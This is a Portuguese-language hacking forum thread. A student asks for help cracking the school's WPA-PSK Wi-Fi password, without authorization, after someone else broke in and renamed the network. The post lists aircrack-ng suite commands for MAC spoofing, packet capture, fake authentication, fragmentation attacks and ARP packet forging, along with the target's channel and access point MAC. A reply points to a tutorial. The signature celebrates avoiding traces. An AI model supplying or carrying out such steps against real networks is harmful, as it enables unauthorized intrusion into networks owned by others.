Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Crackear uma Rede WPA

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Duvida Crackear uma Rede WPA

    Bem pessoal, eu sou meio noob na área de Pen Test mas eu preciso da ajuda de vcs...
    Na minha escola quase todo mundo tinha a senha do Wi-fi de lá, um dia ninguem conseguiu entra pq mudaram senha, daí ontem além da senha o nome da rede mudou para "EuComiADiretora" , alguem quebro a senha e mudo o nome da rede e a senha, ninguem sabe como, daí eu e um amigo queremos fazer o mesmo (pelo menos descobrir a senha), eu tentei pelo BackTrack 5 usando esses códigos q eu vi em alguns tutoriais:

    Código:
    lsusb
    airmon-ng
    airmon-ng stop wlan0
    clear
    ifconfig wlan0 down
    macchanger -m 00:11:22:33:44:55 wlan0
    airmon-ng start wlan0
    airodump-ng wlan0
    airodump-ng -c <channel> -w temple --bssid <bssid> wlan0
    Código:
    aireplay-ng -1 0 -a <bssid> -h 00:11:22:33:44:55 wlan0
    aireplay -5 -b <bssid> -h 00:11:22:33:44:55 wlan0
    packetforge-ng -0 -a <bssid> -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y <nome do arquivo .xor> -w arp
    aireplay-ng -2 -r arp wlan0
    tentei outros comandos tambem, mas sempre dá erro no meio do processo....

    Eu preciso da ajuda de vcs pra conseguir Crackear a rede, pelo menos descobrir a senha

    São essas as informações q eu consegui sobre a rede (não sei se vai ajudar muito) :

    Segurança: WPA-PSK
    Canal: 6
    Ponto de acesso MAC: 00:25:86:C5:7F:A8

    Hacking is like sex. You get in, you get out, and hope that you didn't leave something that can be traced back to you.

  • Font Size
    #2
    dá uma olhada no post... vocês vão ter que estudar um pouco para fazer isso!!

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    ________________

    Comment


    • Font Size
      #3
      putz eu nem tinha visto esse tópico, mas valeu Don Corleone !

      Hacking is like sex. You get in, you get out, and hope that you didn't leave something that can be traced back to you.

      Comment

      X
      Working...
      X